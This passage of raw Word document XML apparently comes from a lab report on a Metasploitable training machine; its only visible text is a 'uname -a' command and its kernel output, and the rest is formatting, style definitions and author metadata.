          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214E9827" w14:textId="30F99526" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="004F4A53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="80"/>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2FCFB5" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A71B41A" w14:textId="77777777" w:rsidR="008814BB" w:rsidRPr="003A2A16" w:rsidRDefault="008814BB" w:rsidP="003A2A16">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008814BB" w:rsidRPr="003A2A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A6514"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3A87A7C"/>
    <w:lvl w:ilvl="0" w:tplc="7076C114">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="450" w:hanging="270"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A740BA3A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E7C638FE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B2F869C4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1960D436">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="BA7CB24C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="981CD738">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="1174116C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="AD62FDEA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="339D4C02"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="67B2B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16"/>
    <w:rsid w:val="00191B33"/>
    <w:rsid w:val="003A2A16"/>
    <w:rsid w:val="003E187E"/>
    <w:rsid w:val="004F4A53"/>
    <w:rsid w:val="006657C5"/>
    <w:rsid w:val="00805F90"/>
    <w:rsid w:val="008814BB"/>
    <w:rsid w:val="009B63A8"/>
    <w:rsid w:val="00A6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040F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{21C67EA3-0AEE-401E-AE52-A4FAFF55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A16"/>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link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003A2A16"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="2E74B5"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003A2A16"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="2E74B5"/>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A16"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="2E74B5"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003A2A16"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="2E74B5"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:qFormat/>
    <w:rsid w:val="003A2A16"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>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3A2A1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2096</Words>
  <Characters>11948</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Surakshya Chhetri</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Surakshya Chhetri</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-22T18:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-23T02:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>